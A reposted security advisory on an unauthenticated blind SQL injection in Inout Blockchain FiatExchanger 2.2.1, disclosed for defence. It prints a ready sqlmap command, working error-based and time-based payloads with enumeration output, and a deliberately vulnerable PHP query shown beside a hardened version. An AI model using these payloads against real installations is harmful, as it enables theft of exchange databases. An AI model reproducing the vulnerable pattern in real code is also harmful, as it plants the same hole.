区块链 FiatExchanger 2.2.1 SQL 注入

Posted by admin, 2022-05-26 02:43:41, in Security Articles

May 25 vulnerability advisory

Information

Vulnerability Name : Remote Blind SQL Injections in Inout Blockchain FiatExchanger
Product            : Inout Blockchain FiatExchanger
Version            : 2.2.1
Date               : 2022-05-21
Vendor Site        : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/
Exploit Detail     : https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md
CVE-Number         : In Progress
Exploit Author     : Mohamed N. Ali @MohamedNab1l


Vulnerable parameter: symbol (GET)

An SQL injection vulnerability was found in the Blockchain FiatExchanger v2.2.1 platform. It allows a remote, unauthenticated attacker to inject SQL code, which may lead to complete disclosure of the database contents.


Vulnerable file:

/application/third_party/Chart/TradingView/chart_content/master.php, line 130
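As an added illustration (not the vendor's code, which the advisory does not reproduce), here is a hypothetical history endpoint that splices the symbol parameter into its query, beside a hardened version that validates the symbol's shape and binds it through a PDO prepared statement. The table and column names (candles, symbol, ts, resolution) are assumptions.

```php
<?php
// Added illustration, not FiatExchanger's own code. Table and column names are assumed.

// Vulnerable pattern: the raw GET value becomes part of the SQL text. A single
// quote in symbol ends the string literal, which is exactly what the advisory's
// error-based and time-based payloads rely on.
function history_vulnerable(mysqli $db, array $get): array
{
    $symbol = $get['symbol'] ?? '';
    $from   = (int) ($get['from'] ?? 0);
    $sql = "SELECT ts, open, high, low, close FROM candles
            WHERE symbol = '$symbol' AND ts >= $from";
    $result = $db->query($sql);
    return $result ? $result->fetch_all(MYSQLI_ASSOC) : [];
}

// Hardened: reject anything that does not look like a trading pair, validate the
// numeric inputs, then bind every value so it is only ever treated as data.
function history_safe(PDO $db, array $get): array
{
    $symbol = $get['symbol'] ?? '';
    // Allow-list the expected shape, e.g. BTC-BCH (assumed format).
    if (!preg_match('/^[A-Z0-9]{2,10}-[A-Z0-9]{2,10}$/', $symbol)) {
        http_response_code(400);
        return [];
    }
    $from = filter_var($get['from'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    $res  = filter_var($get['resolution'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($from === false || $res === false) {
        http_response_code(400);
        return [];
    }

    // Use real server-side prepares so the driver never interpolates values itself.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $stmt = $db->prepare(
        'SELECT ts, open, high, low, close FROM candles
         WHERE symbol = :symbol AND resolution = :res AND ts >= :from
         ORDER BY ts'
    );
    $stmt->bindValue(':symbol', $symbol, PDO::PARAM_STR);
    $stmt->bindValue(':res', $res, PDO::PARAM_INT);
    $stmt->bindValue(':from', $from, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

The allow-list check is a second layer, not a substitute for the prepared statement: the bound parameter is what prevents injection, the regex simply rejects malformed input early and keeps the error-based probe from ever reaching the database.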


Sqlmap command:

python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db --dbs --current-user

Output:

[20:05:54] [INFO] 从文件 '/root/sqlmap/data/txt/user-agents.txt'
[20:05:55] [INFO] 测试与目标 URL 的连接
[20:05:55] [WARNING] 在 HTTP 响应正文中发现 DBMS 错误,这可能会干扰测试结果
sqlmap 恢复了来自存储会话的以下注入点:

Parameter: symbol (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))kVcR) AND 'JGrB'='JGrB

[20:05:55] [INFO] testing MySQL
[20:05:56] [INFO] confirming MySQL
[20:05:57] [INFO] the back-end DBMS is MySQL
[20:05:57] [INFO] fetching banner
[20:05:57] [INFO] resumed: '5.6.50'
web application technology: PHP 7.0.33
back-end DBMS: MySQL >= 5.0.0
banner: '5.6.50'
[20:05:57] [INFO] fetching current user
[20:05:57] [INFO] retrieved: '[email protected]'
current user: '[email protected]'
[20:05:57] [INFO] fetching current database
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'
current database: 'inout_blockchain_fiatexchanger_db'
[20:05:57] [INFO] fetching database names
[20:05:57] [INFO] resumed: 'information_schema'
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_addons_db'
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_cryptotrading_db'
[20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db'
[20:05:57] [INFO] resumed: 'mysql'
[20:05:57] [INFO] resumed: 'performance_schema'
available databases [6]:
[] information_schema
[] inout_blockchain_fiatexchanger_addons_db
[] inout_blockchain_fiatexchanger_cryptotrading_db
[] inout_blockchain_fiatexchanger_db
[] mysql
[] performance_schema

Timeline

2022-05-03: Discovered the bug
2022-05-03: Reported to vendor
2022-05-21: Advisory published

Discovered by

Mohamed N. Ali
@MohamedNab1l
ali.mohamed@gmail.com

References

  • https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md

Originally published on the WeChat public account Ots安全: 区块链 FiatExchanger 2.2.1 SQL 注入

Source: https://cn-sec.com/archives/1050161.html